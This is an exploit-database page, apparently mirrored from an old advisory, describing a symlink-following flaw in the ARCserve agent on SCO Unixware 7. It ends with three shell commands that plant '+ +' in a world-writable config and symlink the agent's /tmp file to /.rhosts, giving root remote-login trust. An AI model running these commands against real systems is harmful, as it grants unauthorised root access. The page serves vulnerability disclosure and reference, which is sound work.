header-logo
Suggest Exploit
vendor:
Unixware
by:
7.5
CVSS
HIGH
Symlink Following
59
CWE
Product Name: Unixware
Affected Version From: SCO Unixware 7
Affected Version To:
Patch Exists: NO
Related CWE:
CPE: a:sco:unixware:7
Metasploit:
Other Scripts:
Platforms Tested:

Symlink Following Vulnerability in ARCserve Agent

The ARCserve agent in SCO Unixware 7 has a vulnerability that allows any user on the system to replace files created by the asagent program in /tmp with symlinks. This can be exploited to create files anywhere on the filesystem owned by root. The contents of the new file are stored in /usr/CYEagent/agent.cfg, which is world writable.

Mitigation:

Apply the necessary patches or updates provided by the vendor.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/988/info

A symlink following vulnerability exists in the ARCserve agent, as shipped with SCO Unixware 7. Upon startup, the asagent program will create several files in /tmp. These are created mode 777, and can be removed and replaced by any user on the system. If these are replaced with symlinks, files can be created anywhere on the filesystem, owned by root. This cannot be used to alter the permissions of existing files. However, the contents of the new file are contained in /usr/CYEagent/agent.cfg. This file is world writable. 

echo "+ +" > /usr/CYEagent/agent.cfg
rm /tmp/asagent.tmp
ln -sf /.rhosts /tmp/asagent.tmp

Navigation

Suggest Exploit

Services By CQR

cqrsecured